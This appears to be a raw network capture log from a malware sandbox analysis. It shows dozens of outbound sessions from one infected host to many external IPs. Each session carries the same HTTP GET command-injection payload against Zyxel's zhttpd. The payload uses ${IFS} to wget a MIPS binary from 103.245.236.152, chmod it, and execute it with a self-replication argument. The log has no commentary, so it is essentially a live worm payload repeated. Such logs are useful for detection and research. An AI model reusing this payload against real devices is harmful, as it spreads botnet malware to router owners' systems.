                                      Jan 14, 2024 15:51:06.767313957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9539192.168.2.143707031.63.235.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767332077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9540192.168.2.145143884.135.173.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767364025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9541192.168.2.145248434.237.2.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767414093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9542192.168.2.1454850115.68.24.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767441988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9543192.168.2.145126646.237.192.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767496109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9544192.168.2.144903698.133.168.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767523050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9545192.168.2.1456576189.178.170.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767559052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9546192.168.2.143935243.71.170.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767595053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9547192.168.2.1456960212.93.124.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767666101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9548192.168.2.145251098.215.140.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767684937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9549192.168.2.143800296.86.203.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767710924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9550192.168.2.144515071.5.136.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767754078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9551192.168.2.1445880168.12.217.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767793894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9552192.168.2.143807661.239.73.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767818928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9553192.168.2.145212285.250.180.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767863035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9554192.168.2.145207427.219.134.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767895937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9555192.168.2.144820480.145.153.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767937899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9556192.168.2.143636078.106.130.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.767982960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9557192.168.2.1436850196.163.250.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.768017054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9558192.168.2.144751482.65.245.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.768044949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9559192.168.2.1452004136.74.23.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.768116951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9560192.168.2.1451298129.162.206.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.768157959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9561192.168.2.1436082203.101.194.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.768204927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9562192.168.2.1450536121.100.124.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.768256903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9563192.168.2.1447586137.138.158.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.768316031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9564192.168.2.145715013.143.230.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.768352985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9565192.168.2.143576088.71.28.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.768404961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9566192.168.2.1456656213.194.115.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.768445969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9567192.168.2.1450774210.198.95.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.768487930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9568192.168.2.144550044.119.56.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.768527031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9569192.168.2.1437318110.42.186.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.768568039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9570192.168.2.1453498184.107.207.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.768624067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9571192.168.2.1437048124.244.221.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.768680096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9572192.168.2.1436940101.236.221.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.768713951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9573192.168.2.1444078146.112.70.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.768758059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9574192.168.2.1447642212.114.155.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.768804073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9575192.168.2.144613451.241.22.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.768857956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9576192.168.2.144932845.237.53.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.768910885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9577192.168.2.1440116158.74.83.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.768944025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9578192.168.2.143713459.164.159.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.768979073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9579192.168.2.1451922180.85.236.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.769037962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9580192.168.2.1456506165.126.234.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.769076109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9581192.168.2.143595067.174.0.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.769113064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9582192.168.2.143390889.210.199.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.769154072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9583192.168.2.144852290.229.254.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.769217968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9584192.168.2.1450718163.204.161.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.769273996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9585192.168.2.1453180199.164.44.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.769309998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9586192.168.2.1438256156.234.238.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.769364119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9587192.168.2.1436024186.244.156.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.769387007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9588192.168.2.1451756196.153.114.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.769426107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9589192.168.2.143497865.13.86.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.769454956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9590192.168.2.143303257.66.121.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.769488096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9591192.168.2.1452854169.137.93.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.769526958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9592192.168.2.144859635.237.156.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.769551039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9593192.168.2.1459718194.175.96.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.769604921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9594192.168.2.145052843.120.236.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.769640923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9595192.168.2.1446612189.205.4.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.769669056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9596192.168.2.1438156113.232.20.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.769716024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9597192.168.2.144092666.197.38.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.769754887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9598192.168.2.1451012158.166.77.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.769787073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9599192.168.2.144030878.188.225.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.769834995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9600192.168.2.1455794222.79.192.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.769871950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9601192.168.2.1460768204.183.190.247443
                                      TimestampBytes transferredDirectionData
